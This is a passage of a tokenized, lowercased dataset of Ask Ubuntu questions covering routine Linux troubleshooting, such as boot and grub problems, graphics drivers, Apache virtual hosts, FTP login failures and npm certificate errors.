hr 2 } $ { offset 15 } $ { font ubuntu : size=10 , weight : normal } $ { color1 } $ sysname $ kernel $ { offset 15 } $ { font ubuntu : size=10 , weight : normal } $ { color1 } $ nodename $ { offset 15 } $ { font ubuntu : size=10 , weight : normal } $ { color1 } uptime : $ uptime # showing cpu graph $ { voffset 20 } $ { offset 120 } $ { cpugraph 40,183 666666 666666 } $ { voffset -25 } $ { offset 90 } $ { font ubuntu : size=10 , weight : bold } $ { color5 } cpu # showing top 5 cpu-consumers $ { offset 105 } $ { font ubuntu : size=10 , weight : normal } $ { color4 } $ { top name 1 } $ { alignr } $ { top cpu 1 } % $ { offset 105 } $ { font ubuntu : size=10 , weight : normal } $ { color1 } $ { top name 2 } $ { alignr } $ { top cpu 2 } % $ { offset 105 } $ { font ubuntu : size=10 , weight : normal } $ { color2 } $ { top name 3 } $ { alignr } $ { top cpu 3 } % $ { offset 105 } $ { font ubuntu : size=10 , weight : normal } $ { color3 } $ { top name 4 } $ { alignr } $ { top cpu 4 } % $ { offset 105 } $ { font ubuntu : size=10 , weight : normal } $ { color3 } $ { top name 5 } $ { alignr } $ { top cpu 5 } % # showing memory part with top 5 $ { voffset 40 } $ { offset 90 } $ { font ubuntu : size=10 , weight : bold } $ { color5 } mem $ { offset 105 } $ { font ubuntu : size=10 , weight : normal } $ { color4 } $ { top_mem name 1 } $ { alignr } $ { top_mem mem 1 } % $ { offset 105 } $ { font ubuntu : size=10 , weight : normal } $ { color1 } $ { top_mem name 2 } $ { alignr } $ { top_mem mem 2 } % $ { offset 105 } $ { font ubuntu : size=10 , weight : normal } $ { color2 } $ { top_mem name 3 } $ { alignr } $ { top_mem mem 3 } % $ { offset 105 } $ { font ubuntu : size=10 , weight : normal } $ { color3 } $ { top_mem name 4 } $ { alignr } $ { top_mem mem 4 } % $ { offset 105 } $ { font ubuntu : size=10 , weight : normal } $ { color3 } $ { top_mem name 4 } $ { alignr } $ { top_mem mem 5 } % # showing disk partitions : root , home and data $ { voffset 28 } $ { offset 90 } $ { font ubuntu : size=10 , weight : bold } $ { color5 } disks $ { offset 120 } $ { diskiograph 33,183 666666 666666 } $ { voffset -30 } $ { voffset 20 } $ { offset 15 } $ { font ubuntu : size=9 , weight : bold } $ { color1 } free : $ { font ubuntu : size=9 , weight : normal } $ { fs_free / } $ { alignr } $ { font ubuntu : size=9 , weight : bold } used : $ { font ubuntu : size=9 , weight : normal } $ { fs_used / } $ { offset 15 } $ { font ubuntu : size=9 , weight : bold } $ { color1 } free : $ { font ubuntu : size=9 , weight : normal } $ { fs_free /home } $ { alignr } $ { font ubuntu : size=9 , weight : bold } used : $ { font ubuntu : size=9 , weight : normal } $ { fs_used /home } $ { offset 15 } $ { font ubuntu : size=9 , weight : bold } $ { color1 } free : $ { font ubuntu : size=9 , weight : normal } $ { fs_free /media/data } $ { alignr } $ { font ubuntu : size=9 , weight : bold } used : $ { font ubuntu : size=9 , weight : normal } $ { fs_used /media/data } # network data ( my desktop have only lan ) . ethernet ring is mostly useless but looks pretty , main info is in the graphs $ { voffset 43 } $ { offset 90 } $ { font ubuntu : size=10 , weight : bold } $ { color5 } ethernet $ { voffset 40 } $ { offset 15 } $ { color1 } $ { font ubuntu : size=9 , weight : bold } up : $ { alignr } $ { font ubuntu : size=9 , weight : normal } $ color2 $ { upspeed eth0 } / $ { totalup } $ { offset 15 } $ { upspeedgraph eth0 40,285 4b1b0c ff5c2b 100 -l } $ { offset 15 } $ { color1 } $ { font ubuntu : size=9 , weight : bold } down : $ { alignr } $ { font ubuntu : size=9 , weight : normal } $ color2 $ { downspeed eth0 } / $ { totaldown } $ { offset 15 } $ { downspeedgraph eth0 40,285 324d23 77b753 100 -l } $ { color4 } $ { hr 2 } what do i need to change ? please help i 'm still a pretty big linux noob .
437087	ubuntu can not start first setup . help !	i finished installing ubuntu 12.10 today . when i booted the os , it booted normally , but the setup would not start . a few minutes later , it said in white text `` continue to wait , or press s to skip mounting or press m for manual recovery . '' a few minutes later , the computer rebooted . i chose `` ubuntu '' and it booted to the grub shell . i do not know the command to load the kernel and start ubuntu . i need to know the command to start ubuntu and get rid if this screen every time i go to start ubuntu . thanks !
437088	problems whith phpmyadmin after upgrading to 12.10	after doing a do-release-upgrade i try to access phpmyadmin . it dsiplays the login but when i try to log in it gives me an page not found error . during the upgrade it asked me whether or not to replace some config files with the newer ones and i responded with n. any suggestions ?
437089	what is the default font in ubuntu ?	what is the default font in ubuntu ? could someone tell me please ?
437090	hiding an application from switcher [ alt+tab ]	i would like to hide cairo-dock from the switcher since it is redundant to have it there . i 've googled for solutions without any luck .
437091	audio delay in both firefox and chrome . ubuntu 13.10	new ubuntu user here . i absolutely love ubuntu and it is my main os now , yet there 's a problem i have n't found a fix for , yet . there 's a massive audio delay in any internet browser , ex : on youtube i pause or press play , there 's a delay before audio catches up . same with flash based games ex : flashflashrevolution . it 's rather annoying and i 'm stumped . note : vlc works fine with any videos i have , no delays whatsoever , also other programs like spotify and skype seem to be working fine , too . edit : videos played in steam have the delay as well .
437095	undefined symbol : pyexc_typeerror	i 'm using ubuntu 12.04 and i have weird problem that started appearing . i 've been using virtualenv command for working with my python projects and i never had trouble with it . however , for some reason ( i really do n't know what ) now it does n't work anymore . i 've tried to create new virtualenvironment for one of my projects but it keeps giving me error : traceback ( most recent call last ) : file `` /usr/local/bin/pip '' , line 9 , in < module > load_entry_point ( 'pip==1.4.1 ' , 'console_scripts ' , 'pip ' ) ( ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 337 , in load_entry_point return get_distribution ( dist ) .load_entry_point ( group , name ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 2279 , in load_entry_point return ep.load ( ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 1989 , in load entry = __import__ ( self.module_name , globals ( ) , globals ( ) , [ '__name__ ' ] ) file `` /usr/local/lib/python2.7/dist-packages/pip/__init__.py '' , line 10 , in < module > from pip.util import get_installed_distributions , get_prog file `` /usr/local/lib/python2.7/dist-packages/pip/util.py '' , line 8 , in < module > import zipfile file `` /usr/lib/python2.7/zipfile.py '' , line 6 , in < module > import io file `` /usr/lib/python2.7/io.py '' , line 60 , in < module > import _io importerror : /usr/lib/python2.7/lib-dynload/_io.so : undefined symbol : pyexc_typeerror error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 66 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : /usr/lib/python2.7/lib-dynload/pyexpat.so : undefined symbol : pyexc_typeerror original exception was : traceback ( most recent call last ) : file `` /usr/local/bin/pip '' , line 9 , in < module > load_entry_point ( 'pip==1.4.1 ' , 'console_scripts ' , 'pip ' ) ( ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 337 , in load_entry_point return get_distribution ( dist ) .load_entry_point ( group , name ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 2279 , in load_entry_point return ep.load ( ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 1989 , in load entry = __import__ ( self.module_name , globals ( ) , globals ( ) , [ '__name__ ' ] ) file `` /usr/local/lib/python2.7/dist-packages/pip/__init__.py '' , line 10 , in < module > from pip.util import get_installed_distributions , get_prog file `` /usr/local/lib/python2.7/dist-packages/pip/util.py '' , line 8 , in < module > import zipfile file `` /usr/lib/python2.7/zipfile.py '' , line 6 , in < module > import io file `` /usr/lib/python2.7/io.py '' , line 60 , in < module > import _io importerror : /usr/lib/python2.7/lib-dynload/_io.so : undefined symbol : pyexc_typeerror do you have any idea why is that and how to fix it ? thanks
437096	hp 250 g2 - problem with graphics	i bought hp 250 g2 without os and tried to install ubuntu 13.10 / ubuntu 12.04.2 lts . i am not able to run and even install ubuntu because everytime i try to run it , my display turns off . i know the system is running well ( i can hear login sound ) , but i can not see anything on my display . i am only able to run it correctly with nomodeset , but there is only 1024x768 or 800x600 resolution . because my laptop is 16:9 , i would like to set higher resolution . i tried to install official intel drivers ( 01.org ) - installed successfully , but othing happens . this is my configuration : hp 250 g2 ( ubuntu.com says it was tested successfully - http : //www.ubuntu.com/certification/hardware/201309-14164/ ) ; screen : 39.6 cm ( 15.6 `` ) ; graphics : intel hd 4000 , discrete nvidia 820m ( dedicated dd3 memory 1 gb ) ( switchable graphics ) ; cpu : intelâž coreâ˘ i3-3110m with intel hd 4000 graphic card ( 2,4 ghz , cache 3 mb , 2 cores ) ; ram : 2gb appreciate your suggestions .
437098	sterio mix in ubuntu 13.10 ?	i 've been wondering if in ubuntu , i can `` spoof '' another microphone that is actually the speakers and the microphone fused together . my audio card supports this . what i mean is , for example , if i 'm on a skype call , since i usually wear headphones , i want them to be able to hear what my pc speakers are outputting and what my microphone is picking up . that way , i can get together with a friend and watch netflix ( using wine ) or play a game and have him hear the audio . this can also be useful in other scenarios . in windows , this is referred to as `` sterio mix ''
437102	ca n't get to the grub menu on imac g5	i have an imac g5 , i 'm trying to install ubuntu 12.04 , but i 've had an error that i 've gotten the solution to , but the solution requires me to get to the grub menu , and i ca n't seem to do that . i know that you 're susposed to press a button before startup , i 've tried the following but none worked . ( all of which were found on askubuntu and the ubuntu forums ) shift ( right and left ) tab space c i would imagine there are n't that many options to begin with , but i still need a tip on how to get to it . thanks in advance .
437103	transferring netbeans ide for windows to netbeans ide for an ubuntu based distro	i 'm not exactly using ubuntu but i am using elementary os luna 0.2 , which is based on ubuntu so i 'm hoping the same instructions can be applied . i want to start using luna as my primary os and move away from windows . luna is installed on the hard drive because i wanted the os to have the freedom to use all or most system resources to function at optimal efficiency , instead of having to share resources like you would with visualization software . as such i ca n't easily switch between oses . i 've been learning java from home-and-learn and i use netbeans ide to construct and compile code for the exercises given ( for loops , array , etc ) . project folders are created for each new exercise and they come in handy for when i need to look back and refresh my memory . i would like to transfer my netbeans folders from windows to netbeans for linux . so here are my questions . can i use a usb flash drive or cloud storage to transfer the folders from windows to linux and keep the integrity of the data ? where in luna should i place the folders so that my projects show up in the netbeans ide app ? can this data transfer be done through the command line ? windows is stored on the os partition and luna is stored on the data partition thanks in advance for the help , however helpful . sorry if this was asked before . sorry for the typos .
437104	ubuntu usb boot not working	i am trying to install ubuntu 12.04 . i put it on an usb stick because my netbook does not have an optical drive and when i put it in it boots right back to windows . i set it to boot to usb and i do not know if i need to download any additional software for it to be seen .
437105	itunes2rhythm python3 script errors	while trying to run this script https : //github.com/guillier/itunes2rhythm in python3 i am getting multiple errors about localhost blah blah . i think what is happening is that the library file is referencing old directories . what i am wondering is how do i resolve this ? do i have to manually go into the library.xml file and edit each line that has old links ? ? here is my itunes2rhythm.conf file http : //pastebin.ubuntu.com/7127789/
437107	remote into windows server from lubuntu on same network	i would like to remote into my windows server 2003 from lubuntu or any other linux os that is preferrable . i am new to linux so i am not sure what os is best for this purpose or what other applications i will need to load to acheive my goal . thanks for the help .
437108	newly installed ubuntu fatal graphics errors	i just got a toshiba satellite l870 f0059 laptop . it has an intel core i5 3230m processor , 6gb ram and an amd radeon hd 7670m graphics card . i removed windows 8 and installed ubuntu 12.04 from a dvd with the image found online . upon installing some software ( the last command i ran was sudo apt-get install indicator-brightness because the laptop had no screen brightness functions ) when all of a sudden the whole screen became fuzzy and had black lines across it . after i restarted , the lines were still there , as well as the fuzziness . in addition , the screen was split and while i could move the mouse , clicking or keyboard actions did nothing . since i could do nothing , i reinstalled ubuntu after checking dvds , which ubuntu setup said was fine . first thing i did after the new installation was to install the graphics drivers . there were three drivers with an identical name with a gray disk icon , so i decided to start installing them from top to bottom , restarting after each one . after i installed the third one ( it later said post-release updates after the driver name ) , the same thing happened . i got a fuzzy split screen with black lines that did not respond to mouse clicks or key presses . i pressed ctrl-alt-f1 and ran the command : sudo apt-get update , but nothing changed . i just reinstalled ubuntu again . the installation had internet access . i followed the install instructions , but have done nothing else in fear of messing something up . i am new to ubuntu , but i need it for the work i must do . please advise me in great detail , especially about the following : why the fuzzy unresponsive split screen with black lines running horizontally ? why did i see a list ( initially ) of three identically named amd graphics drivers ( called ubuntu driver for the amd graphics accelerators ) , and which one should i install ? is there anything i should do first to ensure that this wo n't happen ?
437110	how to mount added sata drive ?	i recently replaced my computer with an older ep-8kari-x motherboard that was lent to me until i could buy a new mb . the bios does not recognize sata drives for booting , so i mounted a 250gb sata drive into a usb sata box and proceeded to install ubuntu 12.04 using an active cd . the installation went well and i can use ubuntu and boot from this usb interface . i then installed a second 500gb sata drive into into the computer . using disk utility , i had hoped to be able to mount this drive . it was partitioned in two 250gb partitions in my old computer , one being ntfs and the other ext3 . i had hoped to be able to install win xp on the ntfs partition , but it does not show up . i tried listing devices in /media/ and found only floppy and floppy ( o ) . can anyone help a beginner figure out how to mount the added sata drive ? is there a command to probe for it , or a program ?
437115	some pdf files do n't open last view	i have edit > preferences > documents > ( check ) restore last view settings when reopening documents . some pdf files , lets say i am viewing page 52 , after i close the file and open the file again , it takes me right to page 52 . some pdf files , lets say i am viewing page 38 , after i close the file and open it again , it starts from page 1 . any idea how i can fix this for those files that do n't remember my last page view .
437116	s video performance using ati-driver-installer-9-3-x86.x86_64.run on u 12.4	i have a new installation of ubuntu 12.4 using the ati-driver-installer-9-3-x86.x86_64.run driver for my radeon 9600 . graphics in details shows gallium 0.4 on ati rv350 . when s video is connected an unknown monitor is detected and the video output is unusable . i have tried a dozen ways to set an xorg.config file for this so that i can set the output of the card to ntsc for the s video but have been unable to get an xorg.config to configure . believe me i have tried many of the posts and commands to get this file made and i am not even sure that setting the s video output will help . i am very new to ubuntu but have gotten everything i needed working fixed , due to posts on askubuntu . is there any help for this ? id ' sure like the s video working as well as it used to on xp .
437119	unity web apps do not work in chromium	i am using stock , basic ubuntu 13.10 . i have the chromium browser installed from the software center , and i have the chromium web apps extension installed . i have all of the unity web apps , and the unity web app service apps installed , and they are the latest version , according to the terminal . i have the option to notify me when a website can be run as an app setting selected in chromium . my google account , and my twitter account are added in the online accounts settings for ubuntu . when i go to gmail , or any supported website , i get no notification , no popup asking if i want to create a web app , no option to create a web app , nothing . it is as if i have nothing at all installed . but i do . i installed them all from the terminal , and i have confirmed that everything is there . every single web app shows up in my unity search , and the extension shows in my extensions for chromium . every search i have done on a solution for this has come up with something that does not work for me , or that i have already done . please tell me what i am missing , because i really want to use this feature . is there some setting i need to change in the browser that i have n't done or something else that i need to do ?
437123	after upgrade i have no network capability	i upgraded from 11.10 to 12.04 and now i have no network capability , no wired , no wifi . i have looked at various solutions offered on the net to no avail . i am a noob and only vaguely familiar with linux . i have had several versions of ubuntu on my dell laptop and everyone of them configured the network connections automaticaly . why would ubuntu take this important function and turn it into a nightmare . if they are trying to discourage new users they are off to a good start ! does anyone have a solution that does n't require a steep learning curve ? my laptop is a dell inspiron with an amd processor ( turion 64x2 ) and a broadcomm wifi card .
437126	how to get `` do n't starve '' game to work from its .rar file ?	i am trying to get do n't starve for my samsung chromebook with ubuntu and i ca n't figure out if i can play it since it 's a .rar file . if anybody knows please let me know .
437127	/home automatically ecrypted during multi boot ?	i was attempting to add a mint partition to my ubuntu 12.04/win7 box , when the whole process went south on me . mint installed correctly but removed the ubuntu/win options from my grub menu . attempting to fix that was where things got messed up -- currently the box boots to a grub > prompt . using grub i can find a kernal image and boot to a busybox prompt , but if i attempt to continue the boot process , it enters a kernal panic ( exit code is 00000200 ) . what seems really weird is that my old ubuntu home folder is accessible if i boot with a mint or ubuntu livecd ( mounted under /media ) , however my /home/liav subdirectory has been ecrypted . i do n't recall ever setting up any /home/liav encryption . i can sudo into /media/home/liav and cat the readme file therein which only says `` this directory has been unmounted to protect your data '' plus instructions to 'ecryptfs-mount-private ' , which i obviously ca n't do as root in a livecd session ( returns 'encrypted private directory is not setup properly ' ) . using 'chown -r ' to take ownership of the directories made no difference . why was /home/liav ecrypted ? is there a way i can recreate the user account which would have access to the encrypt keys ? i did do a back up of my main /home subdirectory , but would prefer not to lose the dir if possible .
437129	find out device from network interface	i need to find out the device address of my inbuilt mobile broadband card , in order to change the pin of my sim card with gsmctl . it requires the device parameter : -d device , -- device device the device to which the gsm modem is connected . the default is /dev/mobilephone . now interface works fine an is assigned to wwan0 : private @ linux : /dev $ ethtool -i wwan0 driver : cdc_ncm version : 14-mar-2012 firmware-version : mobile broadband network device bus-info : usb-0000:00:1d.0-1.6 supports-statistics : no supports-test : no supports-eeprom-access : no supports-register-dump : no supports-priv-flags : no how do i find out the device address ( in /dev/ ) for this interface ?
437130	apache vhosts stop working after update	i am running several websites on my server . for example , one of them is on /var/www/mysite.com/ . i upgraded the apache2 in my ubuntu 12.04 webserver to version 2.4 , and the installation rewrote ports.conf and apache2.conf , so i added the configuration items that were missing , but now when i try to access http : //mysite.com , what i get is the directory listing to /var/www . what am i missing ? important : i am using port 8080 because i am using nginx as reverse proxy on port 80 . that part is working allright . ports.conf # if you just change the port or add more ports here , you will likely also # have to change the virtualhost statement in # /etc/apache2/sites-enabled/000-default.conf listen 8080 < ifmodule ssl_module > listen 443 < /ifmodule > < ifmodule mod_gnutls.c > listen 443 < /ifmodule > apache2.conf # this is the main apache server configuration file . it contains the # configuration directives that give the server its instructions . # see http : //httpd.apache.org/docs/2.4/ for detailed information about # the directives and /usr/share/doc/apache2/readme.debian about debian specific # hints . # # # summary of how the apache 2 configuration works in debian : # the apache 2 web server configuration in debian is quite different to # upstream 's suggested way to configure the web server . this is because debian's # default apache2 installation attempts to make adding and removing modules , # virtual hosts , and extra configuration directives as flexible as possible , in # order to make automating the changes and administering the server as easy as # possible . # it is split into several files forming the configuration hierarchy outlined # below , all located in the /etc/apache2/ directory : # # /etc/apache2/ # | -- apache2.conf # | ` -- ports.conf # | -- mods-enabled # | | -- *.load # | ` -- *.conf # | -- conf-enabled # | ` -- *.conf # ` -- sites-enabled # ` -- *.conf # # # * apache2.conf is the main configuration file ( this file ) . it puts the pieces # together by including all remaining configuration files when starting up the # web server . # # * ports.conf is always included from the main configuration file . it is # supposed to determine listening ports for incoming connections which can be # customized anytime . # # * configuration files in the mods-enabled/ , conf-enabled/ and sites-enabled/ # directories contain particular configuration snippets which manage modules , # global configuration fragments , or virtual host configurations , # respectively . # # they are activated by symlinking available configuration files from their # respective *-available/ counterparts . these should be managed by using our # helpers a2enmod/a2dismod , a2ensite/a2dissite and a2enconf/a2disconf . see # their respective man pages for detailed information . # # * the binary is called apache2 . due to the use of environment variables , in # the default configuration , apache2 needs to be started/stopped with # /etc/init.d/apache2 or apache2ctl . calling /usr/bin/apache2 directly will not # work with the default configuration . # global configuration # # # serverroot : the top of the directory tree under which the server's # configuration , error , and log files are kept . # # note ! if you intend to place this on an nfs ( or otherwise network ) # mounted filesystem then please read the mutex documentation ( available # at < url : http : //httpd.apache.org/docs/2.4/mod/core.html # mutex > ) ; # you will save yourself a lot of trouble . # # do not add a slash at the end of the directory path . # # serverroot `` /etc/apache2 '' # # the accept serialization lock file must be stored on a local disk . # mutex file : $ { apache_lock_dir } default # # pidfile : the file in which the server should record its process # identification number when it starts . # this needs to be set in /etc/apache2/envvars # pidfile $ { apache_pid_file } # # timeout : the number of seconds before receives and sends time out . # timeout 300 # # keepalive : whether or not to allow persistent connections ( more than # one request per connection ) . set to `` off '' to deactivate . # keepalive on # # maxkeepaliverequests : the maximum number of requests to allow # during a persistent connection . set to 0 to allow an unlimited amount . # we recommend you leave this number high , for maximum performance . # maxkeepaliverequests 100 # # keepalivetimeout : number of seconds to wait for the next request from the # same client on the same connection . # keepalivetimeout 5 # these need to be set in /etc/apache2/envvars user $ { apache_run_user } group $ { apache_run_group } # # hostnamelookups : log the names of clients or just their ip addresses # e.g. , www.apache.org ( on ) or 204.62.129.132 ( off ) . # the default is off because it 'd be overall better for the net if people # had to knowingly turn this feature on , since enabling it means that # each client request will result in at least one lookup request to the # nameserver . # hostnamelookups off # errorlog : the location of the error log file . # if you do not specify an errorlog directive within a < virtualhost > # container , error messages relating to that virtual host will be # logged here . if you *do* define an error logfile for a < virtualhost > # container , that host 's errors will be logged there and not here . # errorlog $ { apache_log_dir } /error.log # # loglevel : control the severity of messages logged to the error_log . # available values : trace8 , ... , trace1 , debug , info , notice , warn , # error , crit , alert , emerg . # it is also possible to configure the log level for particular modules , e.g . # `` loglevel info ssl : warn '' # loglevel warn # include module configuration : includeoptional mods-enabled/*.load includeoptional mods-enabled/*.conf # include list of ports to listen on include ports.conf # sets the default security model of the apache2 httpd server . it does # not allow access to the root filesystem outside of /usr/share and /var/www . # the former is used by web applications packaged in debian , # the latter may be used for local directories served by the web server . if # your system is serving content from a sub-directory in /srv you must allow # access here , or in any related virtual host . < directory / > options followsymlinks allowoverride none require all denied < /directory > < directory /usr/share > allowoverride none require all granted < /directory > < directory /var/www/ > options indexes followsymlinks allowoverride none require all granted < /directory > # < directory /srv/ > # options indexes followsymlinks # allowoverride none # require all granted # < /directory > # accessfilename : the name of the file to look for in each directory # for additional configuration directives . see also the allowoverride # directive . # accessfilename .htaccess # # the following lines prevent .htaccess and .htpasswd files from being # viewed by web clients . # < filesmatch `` ^\.ht '' > require all denied < /filesmatch > # # the following directives define some format nicknames for use with # a customlog directive . # # these deviate from the common log format definitions in that they use % o # ( the actual bytes sent including headers ) instead of % b ( the size of the # requested file ) , because the latter makes it impossible to detect partial # requests . # # note that the use of % { x-forwarded-for } i instead of % h is not recommended . # use mod_remoteip instead . # logformat `` % v : % p % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' vhost_combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o '' common logformat `` % { referer } i - > % u '' referer logformat `` % { user-agent } i '' agent # include of directories ignores editors ' and dpkg 's backup files , # see readme.debian for details . # include generic snippets of statements includeoptional conf-enabled/*.conf # include the virtual host configurations : includeoptional sites-enabled/*.conf servername localhost # vim : syntax=apache ts=4 sw=4 sts=4 sr noet my virtual host < virtualhost 127.0.0.1:8080 > servername mysite.com serveralias www.mysite.com documentroot /var/www/mysite.com # begin wordpress < directory /var/www/mysite.com/ > < ifmodule mod_rewrite.c > rewriteengine on rewritebase / rewriterule ^index\.php $ - [ l ] rewritecond % { request_filename } ! -f rewritecond % { request_filename } ! -d rewriterule . /index.php [ l ] < /ifmodule > < /directory > # end wordpress < /virtualhost >
437132	adobe flash player not working	i installed adobe flash player so i could play online indie games and when i try to play them after installation it says i still need adobe flash player specifically . what do i do ? i also tried downloading it in the terminal and still nothing changed . i might have downloaded the wrong type of flash player for the games or firefox does n't like it or something .
437133	ftp scripts fail with 530 after upgrading from 8x . to 12.04	i reinstalled to 12.04 and now all of my ftp scripts fail with `` 530 login incorrect '' . i am getting the login info from my .netrc . my logins also fail if i attempt using wget . i have verified that the logins and passwords are correct . these are scripts that i have been running sucessfully for a long time . .netrc entry : machine url.com login user password userpswd ftp file contents : # /bin/sh cd ftpscripts ftp -v url.com < ftp-getbackup ftp-getbackup file contents : open url.com ... . the wget command looks like this : wget -- cut-dirs=2 -r -- user=user -- password=password ftp : //url.com/data/ as soon as it executes the open command it comes back as ask for the password . it does not matter what you type for a password the failure is always the same . thanks for the help .
437134	does the installation of different oss in the same machine reduce the performance of it ?	i 'm trying to install ubuntu on my computer based on windows 7 sp1 . does the installation of different oss in the same machine reduce the performance of it ? what about of my case ? thanks a lot !
437136	how to quickly delete all the files in ubuntu one with the web interface	i need to delete all files and folders from my ubuntu one account , but i can not delete them all at once , only folder after folder which would be very cumbersome . is there a way to quickly delete all the files ?
437137	dual boot on a 5-year old laptop	i would like to know if i can set up a 64bit version of ubuntu on an old laptop running a 32bit version of windows 7 . the processor is a pentium ( r ) dual-core t4200 2ghz cpu and has 4gbs of ram . how well would this machine handle the dual boot ? i 'm thinking of getting into a little programming .
437139	waiting for network configuration error	when i want to login into my ubuntu system , it appears waiting for network configuration and the second is waiting for more 60 seconds then it appear when we use the common ctrl+alt+f1 the screen system , which caused the problem i think is i ca n't connect to the internet . so i changed something in /etc/network/ , but now i want to it go back to the original the network configuration , but i do n't know what to do . anyone can help ? can anyone give detailed answers ? thank you
437142	after install some dvd programas and cheese input audio dont work in 12.04lts	i installed some dvd programs and cheese ( webcam program ) in 12.04lts 64 bit and after that the only program that recognize my input audio webcam is skype , the sound manager on the system setting tool do n't show me any device and i ca n't configure input for audio and for example the default audio recorder do n't work . thanks for your help
437144	putting firefox in a truecrypt disk	hello i am new to ubuntu , my priority is to move the cache to a mounted truecrypt disk , my biggest problem is that i am confused about `` directories '' , because in windows it was easy to just put the location where i wanted the cache , but in ubuntu i only see /media/username/ without any letter of the mounted disk can someone help me about that ?
437145	ubuntu 13.10 : trying to set default applications for .py files that are n't in the 'open with ' applications	i have followed the instructions in this thread : how do i set idle as the default editor for python scripts ? , but it has n't resulted in the option to open in idle being shown . so i used the 'find applications online ' option in the 'open with ... ' menu and installed spe ( stanli 's python editor ) at it 's recommendation , but the option to open .py files with that also is n't in the menu . does anyone have any suggestions ? i 'm running ubuntu 13.10 and am trying to use python 3.3 . thanks in advance . screenshots : option 1 : option 2 : idle.desktop more open with options
437149	brightness problem in ubuntu 12.04 precise pangolin	i own a acer aspire5734z that has a pentium ( r ) dual-core cpu t4500 @ 2.30ghz ă 2 . i tried this solution , but did not work out : open terminal ( ctrl+alt+t ) and type : sudo gedit /etc/default/grub you will find this line in the new opened window : grub_cmdline_linux_default= '' quiet splash '' change it to : grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' save and close the window and type this in the terminal : sudo update-grub this will update your grub and while rebooting your pc , it will set an extra parameter on the grub menu during boot . this problem might have occur on due to the upgrade on kernel . could there be another solution to problem ?
437150	ubuntu 12.04 not booting after upgrade error drm : gen6_santiize_pm	i am using ubuntu 12.04 on my hp envy laptop since a few years without any problems . i also regularly update ubuntu . yesterday ( on 20.3.2014 ) when i updated , it stopped booting . i get the login screen but after logging in then unity does not load . if i open the command prompt using ctrl+alt+f1 , i get the following error : [ 33.650398 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 15070000 , was 15000000 can anybody please help me kiran
437152	optimal ubuntu home server/raid setup	i have two machines at home ( plus laptop and work laptop ) that i just put in rackmount cases . right now each machine has several drives not set up with raid . in the not too distant future , i want to use the machine that is my main win/ubuntu desktop for a server . the case has lots of room for 10/15 drives or so , so i want to make a good size raid partition . i use the server for a web server , mysql host , mercurial code repo host , samba share file storage . i want to centralize all my file storage , especially music and photos which are currently on my desktop and will take up a lot of space . is it common to build one big raid partition and put everything i want on it ? or should mysql , and the web server be in their own area ?
437154	e : unable to locate package	i 'd like to install a program called my weather indicator , i installed via terminal : $ sudo add-apt-repository ppa : atareao/atareao $ sudo apt-get update and finaly it 's ready to install my-weather-indicator package : $ sudo apt-get install my-weather-indicator reading package lists ... done building dependency tree reading state information ... done e : unable to locate package my-weather-indicator i try add repo and update again but still no result , could anyone help me solve this problem ?
437157	phonegap error installation in ubuntu	good day every one , i tried to install phonegap in my pc but i counter the problem hopefully any can help me . here 's the ubuntu version distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise here 's the error during my installation $ npm http get https : //registry.npmjs.org/phonegap npm err ! error : ssl error : cert_untrusted npm err ! at clientrequest . ( /usr/local/lib/node_modules/npm/node_modules/request/main.js:483:26 ) npm err ! at clientrequest.g ( events.js:156:14 ) npm err ! at clientrequest.emit ( events.js:67:17 ) npm err ! at httpparser.onincoming ( http.js:1294:11 ) npm err ! at httpparser.parseronheaderscomplete [ as onheaderscomplete ] ( http.js:91:29 ) npm err ! at cleartextstream.ondata ( http.js:1176:24 ) npm err ! at cleartextstream._push ( tls.js:375:27 ) npm err ! at securepair.cycle ( tls.js:734:20 ) npm err ! at encryptedstream.write ( tls.js:130:13 ) npm err ! at socket.ondata ( stream.js:38:26 ) npm err ! you may report this log at : npm err ! npm err ! or email it to : npm err ! npm err ! npm err ! system linux 3.8.0-37-generic npm err ! command `` node '' `` /usr/local/bin/npm '' `` install '' `` -gf '' `` phonegap '' npm err ! cwd /home/my_name npm err ! node -v v0.6.17 npm err ! npm -v 1.1.21 npm err ! message ssl error : cert_untrusted npm err ! npm err ! additional logging details can be found in : npm err ! /home/my_name/npm-debug.log npm not ok thanks , wang
437160	3 finger click does n't work , but 3 finger tap works ?	i have a lenovo thinkpad t440p ( with the new clickpad ) with ubuntu 13.10 and i want to assign the right mouse click to the three finger click and the middle mouse click to the two finger click on the clickpad . i used the appropiate option `` clickfinger2 '' `` 2 '' option `` clickfinger3 '' `` 3 '' in the config file in /usr/share/x11/xorg.conf.d with this file the two finger click registers correctly , but the three finger registers as left click . however when i activate tapping by using option `` tapbutton2 '' `` 2 '' option `` tapbutton3 '' `` 3 '' both the two and three finger tap function properly . has anyone an idea how to fix the `` clickfinger3 '' option ?
437163	ubuntu equivalent to microsoft windows shortcuts	is there an equivalent to microsoft windows ' shortcuts in ubuntu ? i am already aware of both hardlinks and symlinks but they miss one feature i find really interesting . if the target file is moved the shortcut is updated and knows the new location of the file . hardlinks i believe have this functionality but only on the same file system while symlinks do not . is there a link that automatically updates the target location ?
